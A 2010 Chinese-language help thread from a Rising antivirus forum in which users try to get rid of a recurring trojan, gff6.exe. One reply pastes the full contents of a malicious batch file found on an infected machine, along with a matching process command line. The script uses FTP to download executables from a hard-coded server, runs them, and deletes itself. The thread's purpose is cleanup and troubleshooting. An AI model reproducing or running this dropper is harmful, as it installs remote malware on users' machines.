gff6.exe杀毒老是杀出这个木马，（尝试关闭445端口可能解决此问题） bbs.ikaka.com

山水无情 - 2010-6-4 12:40:00

附件: SREngLOG.log (2010-6-4 12:39:30, 55.17 K)
该附件被下载次数 407

现在把附件传上让高手看看这个是我搜索的结果

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)

附件: SREngLOG.log

山水无情 - 2010-6-4 12:56:00

高手都去吃饭了吗？有谁在啊？

networkedition - 2010-6-4 12:58:00

日志未见异常，杀毒软件查杀的路径及文件名是什么？lz可以发个截图来看一下。

山水无情 - 2010-6-4 20:46:00

这么上传截图啊？

山水无情 - 2010-6-4 20:48:00

天月来了 - 2010-6-4 21:06:00

自己去手工删除那个gff6.exe文件

尽量压缩发来看看

山水无情 - 2010-6-4 21:22:00

删除了那个文件还是会自动出现~已经试了很多次了~
开机之后一会就会出现这个病毒杀了还有~手动删除gff6.exe但过一会他还是会出现真不知道这么办了

天月来了 - 2010-6-4 21:56:00

你是在局域网内么？

可惜无法知道什么程序在创建那文件

天月来了 - 2010-6-4 22:00:00

文件拿来呀

否则也是发呆

自己观察下到底做什么事会导致这样

xiaommmmm - 2010-6-4 22:09:00

我和LZ中的一样的毒！http://translate.google.com.hk/translate?hl=zh-CN&sl=en&u=http://www.prevx.com/filenames/1675106714119312502-X1/GFF6.EXE.html&ei=7AMJTN-TJczQcanCgMgO&sa=X&oi=translate&ct=result&resnum=5&ved=0CBgQ7gEwBA&prev=/search%3Fq%3Dgff6%26hl%3Dzh-CN%26newwindow%3D1%26safe%3Dstrict
这是我网上找的资料，天月姐可以帮忙看看

天月来了 - 2010-6-4 22:12:00

毫无意义:kaka6:

xiaommmmm - 2010-6-4 22:14:00

C:\WINDOWS\system32存在木马的批处理：g45g.bat，会自动联网下载木马，晕死。。批处理的内容贴出来：echo open 218.25.54.221 2689 > ncc
echo 123>> ncc
echo 123>> ncc
echo bin >> ncc
echo get dfc3.exe >> ncc
echo get gff6.exe >> ncc
echo bye >> ncc
ftp -s:ncc
del ncc
start dfc3.exe
start gff6.exe
del /F /Q g45g.bat

xiaommmmm - 2010-6-4 22:15:00

我用卡卡助手的进程管理看到进程里有3个cmd.exe,命令行是cmd /c echo open 218.25.54.221 2689 > iecho 123>> iecho 123>> iecho bin >> iecho get gff6.exe >> iecho quit >> iftp -s:idel /F /Q igff6.exe

天月来了 - 2010-6-4 22:29:00

那就删除那些类似的批处理

xiaommmmm - 2010-6-4 22:33:00

删了g45g后面是不出现了，但是gff6.exe还是继续有啊

天月来了 - 2010-6-4 22:35:00

文件呢？？

到今天为止，没一个愿意给那gff6.exe

天月来了 - 2010-6-4 22:36:00

dfc3.exe这个文件呢？

xiaommmmm - 2010-6-4 22:41:00

我从瑞星的备份区找到的，传上来给天月姐看看

附件: gff6重命名.rar

风沙cl - 2010-6-4 22:49:00

我和楼主的情况也一样　删除了又出来　郁闷死我了　　
请问　楼主　你是否玩ＤＮＦ？

xiaommmmm - 2010-6-4 22:57:00

我不玩DNF，我是前几天整理电脑，卸载flashwind这个垃圾加速器，一点卸载，瑞星就报毒，然后接着不能上网，借别人电脑查了一下，发现以前也有人出现过这种情况，于是下载winsockfix.exe修复工具修复，然后可以上网了，但是很不幸，就中这个毒了。
我也不知道到底是怎么中的

天月来了 - 2010-6-4 22:58:00

是重启又出现？？还是不重启，单纯删除后，过一会又出现？？

还是运行什么固定的软件后出现？

用瑞星监控一下C:\WINDOWS\system32\文件夹内会有什么程序要创建那文件呢

在瑞星的“系统加固”内的“系统文件保护”中勾起“系统目录”项，并设置触发规则时“提示”，然后重启电脑，看什么东西要在那目录内创建那文件。

xiaommmmm - 2010-6-4 23:15:00

不重启就会出现
已经按天月姐说的做了，有情况就汇报

天月来了 - 2010-6-4 23:19:00

不重启就会出现
:kaka2:

那只有两种可能了

一是局域网内其他电脑影响

二是你电脑内正在运行的什么软件或程序还在继续创建它

xiaommmmm - 2010-6-4 23:22:00

我这就一台电脑，排除第一种可能
这个病毒很奇怪，有的时候是开机20min左右就会出现，有的时候是2个小时左右出现一次断网，然后不能上网，声音也没有，还出现过一次Generic Host Process for Win32 Services错误

byxxdrls - 2010-6-5 10:08:00

有没有安装防火墙？没有的话安装一个试一下。

xiaommmmm - 2010-6-6 19:12:00

防火墙一直开着啊，按天月姐说的观察了两天，GFF6还是会生成，但是瑞星没提示什么文件生成的啊

天月来了 - 2010-6-6 20:27:00

:kaka6:

还真不知道怎么来的了

:kaka6:

天月来了 - 2010-6-6 20:32:00

对了，你是什么系统来着？？？

如果是xp系统，就去下载文件信息快照对比工具，按照内附说明图，将C:\WINDOWS\system32\文件夹和C:\WINDOWS\system文件夹各自建立快照，然后将快照文件压缩后发我看。

附件：文件信息快照工具.rar （右键选择“目标另存为”下载）本链接不支持迅雷等下载工具下载

湖心小筑 - 2010-6-6 21:11:00

主要是system\csrss.exe这个，把他先用删除并禁止再生然后把相关的进程结整掉。

天月来了 - 2010-6-7 9:04:00

如果还回来的话

请试试将tcpip.sys文件复制压缩发来看看

可能此文件被病毒替换了

瑞星卡卡安全论坛